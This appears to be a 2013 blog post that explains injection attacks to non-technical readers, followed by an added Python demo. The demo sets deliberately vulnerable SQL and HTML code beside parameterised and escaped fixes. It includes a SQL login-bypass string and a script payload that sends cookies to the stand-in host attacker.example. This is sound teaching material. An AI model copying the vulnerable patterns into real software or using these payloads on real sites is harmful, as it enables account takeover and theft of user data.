Tuesday, November 5, 2013

OWASP Top 10 For the Average Internet User: Injection

Where can it happen?

This can happen anywhere a website lets users enter text (literally anywhere: comment boxes, Twitter updates, payment fields, username and password fields, search boxes, and so on) and anywhere a website accepts text from the internet that it did not write itself, such as the address of the page you clicked on.

What is it?

A computer program is really just a series of letters and symbols, put together by a person, that a computer understands as instructions and then executes. When a program (like a website, or your browser) handles text that you type, nothing about that text makes it different from the program's own instructions; the distinction between text and program exists only because the program keeps track of it. Think of it like a chocolate bar in a wrapper. The wrapper contains the chocolate bar and you can tell the difference, so you know to eat one and not the other.

But what if someone made a wrapper that looked and smelled like chocolate? You'd probably wind up with a mouthful of paper.

Injection is someone making the text they type into a website look and smell like program code, so that the computer runs it as code instead of treating it as text.

Why should I care?

Usually the code that gets injected is SQL (the language websites use to talk to their databases) or JavaScript (the language that runs inside your browser). Both are very bad. Injected JavaScript runs in your browser with the same powers as the website itself, so it can read what you type on that site, act as you, or send you somewhere else; the possibilities are limited only by the attacker's imagination and the time they have to search for JavaScript tricks on the internet. Injected SQL runs against the website's database, so if the attacker can learn enough about how the website is built, they can often read, change, or delete whatever the site stores, including other people's usernames, passwords, and payment details. (OWASP actually lists JavaScript injection separately, as cross-site scripting, but the mistake behind it is the same one: text and code got mixed up.)
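To make the "wrapper that looks like chocolate" from the last two sections concrete, here is an added example (written for this page; it is not code from the original post or from OWASP). It builds a tiny made-up login database and a made-up comment box, and handles the user's text two ways: the vulnerable way, where the text is glued straight into SQL or HTML, and the safe way, where the text is handed over separately or escaped so it stays text. The users, passwords, comment, and the `attacker.example` address are all constructed for the example; a real site would never store passwords in plain text like this.

```python
"""Added example: the same user text handled as code (vulnerable) and as text (safe).

Everything below is constructed for the example: an in-memory SQLite database
with two made-up users, a made-up comment, and a made-up attacker address.
Only the Python standard library is needed.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database. Passwords are stored in plain text only to keep
    the example short; real sites must store password hashes instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The wrapper that looks like chocolate: the user's text is pasted straight into
    the SQL, so quotes and keywords the user typed become part of the query."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the text travels separately from the SQL, and the
    database engine never interprets it as code, whatever it contains."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def render_comment_vulnerable(comment: str) -> str:
    """Comment glued into the page unchanged: a <script> tag typed by the commenter
    becomes real script in every visitor's browser."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """html.escape turns < > & \" ' into entities, so the browser displays the
    text instead of running it."""
    return '<div class="comment">' + html.escape(comment) + "</div>"


def demo() -> dict:
    """Run both versions against a classic SQL injection string and a script comment."""
    conn = make_db()
    # Typed into the password box. In the vulnerable version the query becomes
    #   ... WHERE username = 'alice' AND password = '' OR '1'='1'
    # and '1'='1' is always true, so the login succeeds with no password at all.
    injected_password = "' OR '1'='1"
    # Constructed comment; attacker.example is a made-up address.
    evil_comment = (
        "<script>document.location='http://attacker.example/?c='"
        "+document.cookie</script>"
    )
    return {
        "real_password_vulnerable": login_vulnerable(conn, "alice", "correct horse"),
        "injected_vulnerable": login_vulnerable(conn, "alice", injected_password),
        "real_password_safe": login_safe(conn, "alice", "correct horse"),
        "injected_safe": login_safe(conn, "alice", injected_password),
        "comment_vulnerable_has_script": "<script>" in render_comment_vulnerable(evil_comment),
        "comment_safe_has_script": "<script>" in render_comment_safe(evil_comment),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The vulnerable login accepts `' OR '1'='1` as a password for anyone, because the database sees it as part of the question being asked rather than as an answer; the parameterised version rejects it because the text never gets the chance to become code. The comment box works the same way: the escaped version shows the visitor the literal characters, while the unescaped one hands the attacker's script to every browser that loads the page.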

How do I protect myself?

Unfortunately, this one is mostly on the people running the websites: the fix is for them to keep what users type separate from the code that runs. The best thing you can do is to be careful which websites you visit. If someone sends you a link that doesn't look familiar, or you don't know why they're sending it to you, find out more from them first. Keeping your browser up to date and logging out of websites when you're done also limits what injected JavaScript can do with your account.

You can also search for the name of the website on Google. If you add "virus" or "malware" to the website's name, Google should return some helpful results telling you whether the website is known for suspicious activity. A clean search is not a guarantee, though; an otherwise trustworthy website can still have an injection bug nobody has noticed yet.